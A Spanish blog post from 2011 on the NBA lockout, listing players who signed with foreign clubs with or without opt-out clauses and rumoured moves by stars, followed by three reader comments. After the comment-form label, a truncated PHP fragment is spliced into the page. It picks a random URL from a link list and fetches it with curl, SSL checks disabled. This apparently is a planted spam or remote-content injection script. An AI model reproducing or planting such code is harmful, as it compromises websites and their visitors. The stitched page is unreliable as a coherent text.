Lockout: quién emigra y quién espera

23 de September de 2011 por Jose_Dantley

Vamos a hacer un resumen lo más esquemático posible de los jugadores que han decidido jugar en el extranjero durante el lockout, así como de la situación de las grandes estrellas mientras se mantiene la incertidumbre. Nos centraremos en los jugadores que tienen un mínimo de relevancia en los rosters de la NBA, así que los Danny Green, Magnum Rolle o Von Wafer no nos van a interesar demasiado.

Jugadores que han comunicado oficialmente que jugarán en el extranjero

Diferenciamos aquellos con cláusula de anulación de contrato si el lockout finaliza. Esta cláusula es obligatoria si el jugador tiene contrato en vigor con la franquicia NBA, dado que en caso contrario la FIBA no daría el visto bueno. Aún así, algunos jugadores aún siendo agentes libres han optado por tener el as en la manga de la cláusula.

Entre los que han firmado sin cláusula nos encontramos con el trío de Denver que se marcha a China. Wilson Chandler, J.R. Smith y Kenyon Martin han aceptado las condiciones impuestas por la Asociación China de Baloncesto que ha prohibido las cláusulas de cancelación anticipada. Los Nuggets serán de momento la franquicia más perjudicada dado que esperaban poder renovar al menos a Chandler y Smith o utilizarlos en algún sign-and-trade. Gran Canaria ata también a Rasual Butler y secundarios con minutos como Douglas-Roberts y Sonny Weems han decidido permanecer todo el año en el extranjero.

Además de los que quieren hacer algo de caja, algún que otro jugador retorna a sus países de origen (Gallinari con Scariolo, Rudy Fernández al Real Madrid, Batum, Ilyasova o incluso Farmar de raíces judías)

La única superestrella es Deron Williams, pero jugadores titulares o reservas clave en sus equipos NBA –Ty Lawson, Gallinari, Batum- también han decidido tomar una postura agresiva y aprender de la experiencia en el extranjero al tiempo que sus bolsillos se lo agradecen

Jugadores con cláusula de cancelación si la NBA se reanuda:

Brasil: Leandro Barbosa

España: Reggie Williams (Caja Laboral), Rudy Fernández (Real Madrid)

Francia: Nicolas Batum (Nancy)

Israel: Jordan Farmar (Maccabbi Tel-Aviv), Trevor Booker

Italia: Danilo Gallinari (Olimpia Milano)

Lithuania: Ty Lawson (Zalgiris Kaunas)

Rusia: DeJuan Blair, Austin Daye

Serbia: Nikola Pekovic (Partizan Belgrado)

Turquía: Ersan Ilyasova, Mehmet Okur, Deron Williams (Besiktas)

Jugadores sin cláusula de cancelación

China: Wilson Chandler, J.R. Smith, Kenyon Martin, Earl Clark

España: Rasual Butler (Gran Canaria)

Italia: Chris Douglas-Roberts (Virtus), DaJuan Summers (Montepaschi)

Lituania: Sonny Weems (Zalgiris)

Rusia: Nenad Krstic (CSKA), Timofey Mozgov (Khimki)

Serbia: Acie Law (Partizan Belgrado)

Turquía: Darius Songaila (Galatasaray)

¿Y el resto?

Muchos son los jugadores que han declinado cualquier interés. Entre ellos destacamos a LeBron James, Nash, Nowitzki, Bosh o Marc Gasol. Sin embargo, muchos otros se están dejando querer. No son muchos los equipos con potencial para absorber contratos millonarios, por lo que la presión puede ser mucha y bastantes jugadores pueden quedarse fuera de los grandes clubes.

El jugador más deseado es Kobe Bryant. La Virtus de Bolonia parece en disposición de hacer una oferta que satisfaga al jugador de los Lakers. Kevin Durant tiene encima de la mesa una oferta millonaria con el Besiktas para jugar con Deron Williams. Aunque si la liga se suspende, los bolsillos más pudientes estarán en China, opción que estarían considerando jugadores como Carmelo Anthony, Stephen Curry o Dwight Howard.

Si el lockout se confirmara son muchos los jugadores que considerarían la ACB como una gran opción. La imagen de la selección se proyecta en la NBA. La ACB se cita siempre como la segunda mejor liga del mundo. Los jugadores pueden verse atraídos, especialmente los más jóvenes, por la idea de aprender de un baloncesto más organizado. Algunos de los que han declarado que les gustaría explorar la opción española son el “leonés” Barea, Biyombo que no se movería realmente de la ACB, Ariza, Ajinca, o el propio Pau Gasol.

Comenta

3 comentarios a esta entrada

  1. inad23 dice:
    #1

    Que yo sepa RAsual Butler ha abandonado el GRan CAnaria y no va a volver debido a presuntos problemas perasonales

      Citar

  2. Txusma dice:
    #2

    Tienes razón. No veremos a Butler en la ACB. Una lástima, siempre hay curiosidad por ver que aportan los jugadores NBA

      Citar

  3. Sancho88 dice:
    #3

    Viendo el panorama post-lock out hay dos cosas claras. La primera, es que la mejor liga europea, supuestamente, que es la Euroliga, ve reforzado un aspecto que hasta ahora a mi juicio le ponía a la altura de ligas menores: el del espectáculo. Poder ver de vuelta a tantos jugadores europeos a competir de nuevo aquí, es un aliciente importante.
    Segundo aspecto. Yo pienso que el lockout se resolverá en navidades o en algún día de estos imporantes, the thanksgiving day, por ejemplo. Vamos, que como mucho nos quedaremos dos mesecitos sin liga y después a disfrutar de nuevo. El petardazo estalló en Las Vegas en un All-Star, si mal no recuerdo, así que se ve que a Stern le gusta elegir fechas importantes para dar noticias importantes.
    Entonces los jugadores que no hayan firmado la clausuilita, me da a mí que perderán a más de un familiar imaginario o de repente una pléyade de problemas personales inauditos llegarán a sus vidas. Es decir, les entrará una morriña del copón. Y en su defecto, los equipos que han apostado por Reggie Williams, Rudy Fernández, Nico Batum, etc. se encontrarán con un problema de credibilidad enorme. ¿Cómo explicaría el señor Florentino o el espantapájaros que hable en su nombre de la sección de baloncesto, un cataclismo como ese, después de que han prometido que Rudy acabará su carrera en el Madrid?
    Yo quiero que todo eso pase, ya que quiero que haya liga y cuanto antes que se reincorporen todos los desertores, poder ver un Cleveland contra Charlotte a 70 puntos cagándome en la puta madre del tío que diseñó la liga con partidos basuras, pero ser feliz por toda la vorágines NBA que es ya como una droga.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>